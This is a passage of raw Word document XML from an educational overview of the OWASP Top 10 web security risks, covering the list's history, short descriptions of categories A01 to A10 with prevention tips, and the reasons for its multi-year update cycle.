          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2. Evolution of the OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED34A27"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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the foundation's flagship project. First published in </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2003</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , it serves as an awareness document highlighting the most critical security risks to web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0683F"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Rather than being updated annually, the list is revised every few years (2004, 2007, 2010, 2013, 2017, 2021, and 2025) to reflect significant shifts in the threat landscape. Historically, early lists were determined primarily by expert consensus. Modern iterations are highly data-driven, analyzing comprehensive datasets comprising millions of vulnerabilities across tens of thousands of applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083C2DEE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Major Historical Trends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAAC4D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Rise and Consolidation of Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the 2000s and early 2010s, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> dominated the #1 and #2 spots because applications constructed queries via unsafe string concatenation. Modern frameworks and ORMs have heavily mitigated these, causing them to be consolidated into broader categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70B93A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Shift to Architecture &amp; Supply Chain:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Early versions of the Top 10 focused primarily on </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>coding errors</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Modern iterations prioritize </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>architectural design flaws</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>supply chain integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , reflecting the reality of modern CI/CD pipelines and heavy reliance on third-party libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427EA2D6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>3. The Core Vulnerabilities: OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F39D180"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The current standard reflects a shift from symptoms to root causes, grouping vulnerabilities into strategic risk categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3826C23D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A01: Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6747A"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Access control ensures users cannot act outside of their intended permissions. When it breaks, attackers can access unauthorized functionality or data (such as viewing another user's account by tampering with a URL identifier).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF4FC1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce a strict </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>deny-by-default</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> policy. Implement centralized access control checks and minimize the exposure of raw database identifiers to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60035403" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A02: Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABADA11"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Modern applications rely heavily on cloud architecture and complex frameworks. This category covers default credentials left unchanged, unneeded features or ports left enabled, and overly permissive cloud storage buckets (like public AWS S3 buckets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4CBC5A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A03: Software Supply Chain Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E2C467"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A massive evolution in modern application security, this category expands on the previous "Vulnerable and Outdated Components." Attackers frequently target open-source dependencies, CI/CD pipelines, and container registries rather than writing custom exploits for application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D957910" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A04: Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5225E5"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 xml:space="preserve">Previously known as </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , this was renamed to address the root cause rather than the symptom. It happens when data in transit or at rest is left unencrypted, or protected by weak, outdated cryptographic algorithms (like MD5 or SHA-1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8475D2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A05: Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A8B289"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This classic vulnerability happens when untrusted user data is sent directly to an interpreter (SQL, NoSQL, LDAP, or OS shell) as part of a command. The interpreter executes the malicious data as code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D602EA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A06: Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173AC059"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Introduced to encourage the industry to "shift left," this focus area addresses flaws inherent to an application's architecture rather than its coding implementation. A perfectly coded program can still be fundamentally insecure if its business logic is flawed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1DB31" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A07: Authentication Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072BDDE"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 xml:space="preserve">Formerly </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Broken Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , this covers flaws that allow attackers to compromise user identities. Examples include allowing weak passwords, permitting brute-force automated attacks (credential stuffing), and poorly managing session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEACA09" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A08: Software or Data Integrity Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165593B0"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 xml:space="preserve">This category focuses on applications that assume untrusted data or code is safe without verifying its integrity. A primary example is </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Insecure Deserialization</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , where an attacker tampers with serialized objects to achieve remote code execution (RCE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F874C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A09: Security Logging and Alerting Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC66FF0"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Without proper logging and monitoring, breaches can go completely unnoticed for months, preventing teams from identifying or containing active attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C11172" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>A10: Mishandling of Exceptional Conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7124A"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This focus area targets how applications behave when something goes wrong. If an application crashes and prints out raw stack traces or database errors directly to an end-user, it leaks vital system architecture details to potential attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56156C7C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>4. History of OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEFB574"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 xml:space="preserve">The OWASP Top 10 list is not updated on a strict annual schedule. Instead, the OWASP Foundation updates the list </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>roughly every 3 to 4 years</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . This buffer gives the security community enough time to collect massive amounts of real-world vulnerability data, analyze changing development trends, and issue a deeply researched update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10E5E7" w14:textId="1BFEA7C1" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The official release timeline for the Web Application OWASP Top 10 includes the following years:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137659A7" w14:textId="52CE82C0" w:rsidR="000D661A" w:rsidRPr="0083079C" w:rsidRDefault="000D661A" w:rsidP="000D661A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="577AF3F6" wp14:editId="22EE1A02">
            <wp:extent cx="3980952" cy="7133333"/>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980952" cy="7133333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50A2B0"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 xml:space="preserve">The most recent official update, released late last year. It formally introduced </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Software Supply Chain Failures</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to address CI/CD pipeline and open-source dependency attacks, while bumping </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Misconfiguration</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> up to the #2 spot due to cloud complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E16A0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Why is there such a gap between updates?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36C60C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Gathering data for the list takes time. For example, to build the current standard, OWASP analyzed over </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>175,000 CVE records</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Common Vulnerabilities and Exposures), mapped hundreds of software weaknesses, and conducted extensive global industry surveys. This rigorous process ensures that each new list serves as a reliable multi-year benchmark for security teams, pen-testers, and compliance frameworks globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58B6F7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FFE44" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="00B74432" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A5D0E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
